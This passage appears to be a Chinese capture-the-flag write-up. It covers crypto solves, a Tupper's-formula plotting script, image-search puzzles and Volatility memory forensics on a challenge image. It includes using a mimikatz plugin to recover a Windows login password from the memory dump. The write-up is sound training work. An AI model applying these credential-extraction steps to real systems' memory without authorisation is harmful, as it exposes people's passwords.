phi = (p1 - 1) * (p2 - 1) * (p3 - 1) * (p4 - 1) * (p5 - 1) * (p6 - 1) * (p7 - 1) * (p8 - 1) * (p9 - 1) * (p10 - 1) * (p11 - 1) * (p12 - 1) * (p13 - 1) * (p14 - 1) * (p15 - 1)
d = inverse(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
我玩青水的 (Unsolved)
求二次剩余
from Crypto.Util.number import *
from secret import flag
m = bytes_to_long(flag)
e = 2
p = getPrime(512)
c = pow(m, e, p)
print(f"p = {p}")
print(f"c = {c}")
'''
p = 7709388356791362098686964537734555579863438117190798798028727762878684782880904322549856912344789781854618283939002621383390230228555920884200579836394161
c = 5573755468949553624452023926839820294500672937008992680281196534187840615851844091682946567434189657243627735469507175898662317628420037437385814152733456
'''e = 2,低指数加密。。。开根号不行
遍历暴力求解。。。不行
OEIS2 (Unsolved)
from hashlib import *
upper = 2**28 + 5
res = 1
for i in range(1, upper + 1):
res *= i
flag = 'Beginctf{' + sha256(str(sum([int(i) for i in str(res)])).encode()).hexdigest() + '}'沃趣,强网杯speed up变体
真的可以查到吗。。。:https://oeis.org/
Misc
real check in
base32解一下就出了
Tupper
塔帕自指公式
提取
import os
# 定义文件夹路径
folder_path = './tupper'
# 拼接文件内容
concatenated_content = ""
for i in range(0, 673, 4):
file_name = str(i) + ".txt"
file_path = os.path.join(folder_path, file_name)
with open(file_path, 'r') as file:
file_content = file.read()
concatenated_content += file_content
# 输出拼接后的内容
print(concatenated_content)base64解一下,然后丢进塔帕自指公式的脚本
import textwrap
import matplotlib.pyplot as plt
K = 14254679371212444332782298821342093450398907096976028002458807598535735172126657504126031171684907173086659505143920349200085808809647256790384378553798580282894239751898620041143383374517064727136903634770936398518575547900512548419486364915399253978157541245911205262493591158497708234319126453587456637302888701303321082210748629800081821684283187362368543601559778431735006794761549342413006621219207322808449232052550578852431361678745355776921143532352419931907838205001184
H = 17
W = 106
if __name__ == "__main__":
plt.figure(figsize=(6.8, 4), dpi=600)
plt.axis("scaled")
K_ = K // 17
for x in range(W):
for y in range(H):
if K_ & 1:
plt.bar(x + 0.5,
bottom=y,
height=1,
width=1,
linewidth=0,
color="black")
K_ >>= 1
plt.figtext(
0.5,
0.8,
r"$\frac{1}{2}<\left\lfloor \operatorname{mod}\left(\left\lfloor\frac{y}{%d}\right\rfloor 2^{-%d\lfloor x\rfloor-\operatorname{mod}(\lfloor y\rfloor, %d)}, 2\right)\right\rfloor$"
% (H, H, H),
ha="center",
va="bottom",
fontsize=18)
plt.subplots_adjust(top=0.8, bottom=0.5)
K_str = textwrap.wrap(str(K), 68)
K_str[0] = f"K={K_str[0]}"
for i in range(1, len(K_str)):
K_str[i] = f" {K_str[i]}".ljust(70)
K_str = "\n".join(K_str)
plt.figtext(0.5,
0.45,
K_str,
fontfamily="monospace",
ha="center",
va="top")
plt.xlim((0, W))
plt.ylim((0, H))
xticks = list(range(0, W + 1))
xlabels = ["" for i in xticks]
xlabels[0] = "0"
xlabels[-1] = str(W)
plt.xticks(xticks, xlabels)
yticks = list(range(0, H + 1))
ylabels = ["" for i in yticks]
ylabels[0] = "K"
ylabels[-1] = f"K+{H}"
plt.yticks(yticks, ylabels)
plt.grid(True, linewidth=0.5, color='gray', linestyle='--')
# plt.show()
plt.savefig("Tupper-plot.png")
# plt.savefig(fname="name", format="svg")
flag:begin{T4UUPER!}
where is crazyman v1.0
社工
我超,水梓!我超,拉菲改!我超,绮良良!🤤
这种地方我能想到的有且只有一个(
flag:begin{秋叶原}
where is crazyman v2.0 (复现)
谷歌识图
需要拖一拖图片的识别区域,不然会变成东京迪士尼。。。
问卷
begin{Thank5_F0r_Your_P@rt1c1pa7ion}
Forensics
逆向工程(reverse)入门指南
非常好指南,使我ctrl+f
学取证咯
cmd
给了个raw文件,先看看镜像的信息
python vol.py -f 学取证咯.raw imageinfoVolatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/cloudflowo/vol/学取证咯.raw)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf800040070a0L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff80004008d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2024-02-02 06:47:30 UTC+0000
Image local date and time : 2024-02-02 14:47:30 +0800发现几个主机(Suggested Profile(s)),接下来选择主机列出cmd历史命令
python vol.py -f 学取证咯.raw --profile Win7SP1x64 cmdscan
得到第一个flag:flag{Cmd_1in3_109_i5_imp0rt@nt}
还记得ie吗?
接下来重建IE缓存及访问历史记录
python vol.py -f 学取证咯.raw --profile Win7SP1x64 iehistory > 1.txt找到第二个flag:flag{Y0v_c@n_g3t_th3_i3hi5t0ry}
计算机的姓名? (复现)
首先安装mimikatz
先到自己volatility的plugins文件夹,安装mimikatz
wget https://raw.githubusercontent.com/RealityNet/hotoloti/master/volatility/mimikatz.py
chmod 777 *然后安装需要的construct包
python2.7 -m pip install construct==2.5.5-reupload这样就能用了,直接查到workgroup的名字
python vol.py -f 学取证咯.raw --profile Win7SP1x64 mimikatz即这里的workgroup User
想登录我的计算机吗? (复现)
同上,flag是那个password
机密文件 (复现)
直接搜机密文件可还行
用filescan提取文件对象(file objects)池信息
python vol.py -f 学取证咯.raw --profile Win7SP1x64 filescan | grep '机密'
然后用dumpfiles导出来
python vol.py -f 学取证咯.raw --profile Win7SP1x64 dumpfiles -Q 0x000000001e742dd0 -D ./1
把导出的dat文件后缀改成docx
真的是取证吗? (复现)
pslist按照EPROCESS列表打印所有正在运行的进程
python vol.py -f 学取证咯.raw --profile Win7SP1x64 pslist
发现flag_is_here.exe
查一下地址,导出来
python vol.py -f 学取证咯.raw --profile Win7SP1x64 filescan | grep 'flag'
python vol.py -f 学取证咯.raw --profile Win7SP1x64 dumpfiles -Q 0x000000001e9d8070 -D ./1
后缀改成exe,拖进ida反编译
shift+f12跟一下FLAG_KEY到sub_401460()
然后emm…我看不懂(
猜测是拿FLAG_KEY和v2的数组进行异或
根据前面我们可知flag是以f开头的,尝试异或
可知key为121,即字母”y”的ascii值
exp:
a = [
31, 21, 24, 30, 2, 32, 73, 15, 74, 38, 21, 74, 57, 11, 23, 74, 29, 38, 17,
73, 15, 15, 38, 13, 73, 38, 31, 73, 11, 74, 23, 76, 16, 26, 76, 4
]
for i in a:
print(chr(i ^ 121), end="")成功得到flag
后日谈:
读一手环境变量
python vol.py -f 学取证咯.raw --profile Win7SP1x64 envars | grep 'flag_is_here'
发现FLAG_KEY的值为key?,也就是说前面的代码逻辑是和FLAG_KEY的第三位进行异或
对应的应该是这段
v6 = sub_4094B0("FLAG_KEY");
v5 = *(_BYTE *)(v6 + 2);